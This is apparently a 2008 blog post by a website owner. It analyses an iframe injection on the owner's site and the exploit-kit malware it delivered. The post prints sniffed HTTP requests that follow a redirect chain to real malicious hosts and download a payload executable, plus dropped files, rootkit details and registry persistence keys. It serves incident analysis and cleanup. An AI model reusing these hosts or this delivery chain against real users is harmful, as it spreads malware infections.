Website with hidden iframe and Malware Analysis

All began this morning (16/10/2008) at 13:00am, I checked the HTML code of index.php and I saw something suspicious inside. Our index.php and 4 other .php pages were infected with an iframe from 11:00am to 13:00am, and fortunately we analyze the code of our site every 2/3 hours, and immediatly removed the infected code.

I decided to analyze the iframe code and used an old version of Internet Explorer 6.0, unpatched to make sure I got infected. I visited that iframe and after a few seconds a massive malware infection started, and my computer started connecting to a lot of different IPs.

Here is result of the network traffic sniffed:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
GET /in.cgi?id111 HTTP/1.1
Host: fstat.cn
Connection: Keep-Alive
 
HTTP/1.1 302 Found
Location: hxxp://mmcounter.com/tds/in.cgi?default
 
GET /tds/in.cgi?default HTTP/1.1
Accept-Language: en-us
Host: mmcounter.com
Connection: Keep-Alive
 
HTTP/1.1 302 Found
Location: hxxp://lite.ff-freehosting.com/all/index.php
 
GET /all/index.php HTTP/1.1
Host: lite.ff-freehosting.com
 
HTTP/1.1 200 OK
Content-Length: 7880
 
GET /all/controller.php?action=bot&entity_list=0 HTTP/1.1
Host: 66.232.116.2
 
HTTP/1.1 200 OK
Content-Length: 397312
Entity-Info: 6:71168:2;10:41984:1;38:42496:2;44:57344:2;46:184320:2;
Rnd: 983332
Magic-Number: 32|0|85:214:242:0:116:131:195:213:214:77:222:73
 
GET /all/load.php?id=45751&spl=5 HTTP/1.1
Host: lite.ff-freehosting.com
Connection: Keep-Alive
 
HTTP/1.1 200 OK
Content-Disposition: inline; filename=load.exe
Content-Length: 17475
 
GET /all/controller.php?action=bot&entity_list=&uid=2&first=1&guid=0&rnd=982735 HTTP/1.1
Host: 66.232.116.2
 
HTTP/1.1 200 OK
Content-Length: 397312
Entity-Info: 6:71168:2;10:41984:1;38:42496:2;44:57344:2;46:184320:2;
Rnd: 983188
Magic-Number: 32|0|185:234:45:115:54:0:22:233:187:219:150
Connection: close

While internet traffic sniffer was active, the computer was infected with malware that was downloaded in Temp folder with the name winMN448Eewaoz.exe and after this file was executed, it dropped a file in C:\WINDOWS\system32\ with the name ~.exe, that was downloaded via this GET query:

1
GET /all/load.php?id=45751&spl=5 HTTP/1.1

We can see the file load.php has a variable named spl with assigned the number 5 and we can assume it has loaded the payload for the exploit (aka sploit) number 5. Again we can assume this is an exploit kit that is serving more than 5 different exploits to infect an user.

Here is a small analysis of that malware activity:

  • Downloaded in Temp Folder as winMN448Eewaoz.exe
  • Copyed in C:\WINDOWS\system32\~.exe
  • Injected code into svchost.exe
  • Opened remote connections with IP 66.232.116.2 on port 80

After some time others files were downloaded in my system. I started Rootkit Unhooker and I noticed some suspicious drivers in the Driver List that made me think of a possible stealth malware or rootkit activity.

If you click properties on driver column of rnvrnrrv.sys you get the file is of 0 bytes… Why 0 bytes and no info on creation/modification etc. ?
The kernel driver rnvrnrrv.sys is loaded and hidden from explorer search (seems that the driver hides every file with name *rnvrnrrv*).

Below there are PE Import Table of rnvrnrrv.sys:

+NTOSKRNL.EXE
ExAllocatePoolWithTag
ExFreePoolWithTag
ZwQuerySystemInformation
RtlImageDirectoryEntryToData
memcpy
memset
_except_handler3

Here is a list of all created files by the malware (there is no order):

1
2
3
4
5
6
7
8
9
10
11
12
13
C:\WINDOWS\msauc.exe
C:\WINDOWS\system32\*randomnumber*.cpx
C:\WINDOWS\system32\*randomnumber*.dat
C:\WINDOWS\system32\wpv*randomnumber*.cpx
C:\WINDOWS\system32\msansspc.dll
%TempFolder%\winMN448Eewaoz.exe
%ProgramFiles%\xeifh\SetActAdm.dll
%ProgramFiles%\Internet Explorer\msansspc.dll
C:\WINDOWS\system32\drivers\rnvrnrrv.sys
C:\WINDOWS\system32\shell31.dll
C:\WINDOWS\system32\fqqtiaag.tmp
C:\WINDOWS\TDEZAALK.exe
%AllUsers%\Application Data\almrahwt\mbqlmfin.exe

The malware created following registry keys:

1
2
3
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\lsass driver
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\TDEZAALK
HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\[51m3u05p5i]

This is a log file of HijackThis with the malware traces:

1
2
3
4
5
6
7
8
9
10
Running processes:
C:\WINDOWS\system32\wpv286.cpx
%AllUsers%\Application Data\almrahwt\mbqlmfin.exe
 
O4 - HKLM\..\Run: [lsass driver] C:\WINDOWS\msauc.exe
O4 - HKLM\..\Run: [TDEZAALK] %systemroot%\TDEZAALK.exe
O4 - HKCU\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\ctfmon.exe
O4 - HKLM\..\Policies\Explorer\Run: [51m3u05p5i] %AllUsers%\Application Data\almrahwt\mbqlmfin.exe
O21 - SSODL: SetActAdm - {002069A6-342F-036E-4AAB-03598A9EEFCE} - C:\Programmi\xeifh\SetActAdm.dll (file missing)
(SwPrvSchedule) - Unknown owner - C:\WINDOWS\system32\wpv5338.cpx.exe (file missing)

What can we do if our website is infected ?

  • Clean the infected HTML/PHP pages
  • Change username and password to the FTP Account
  • Change username and password to the Email Account
  • Change username and password to the SSH
  • Contact the server admin and explain your situation
  • Check your PHP files for possible vulnerabilities
  • Update all the installed software (blog, forum, etc)
  • Remember to never make backups from the website to your PC
  • Use always local backups for the website files

Random Posts

Previous Posts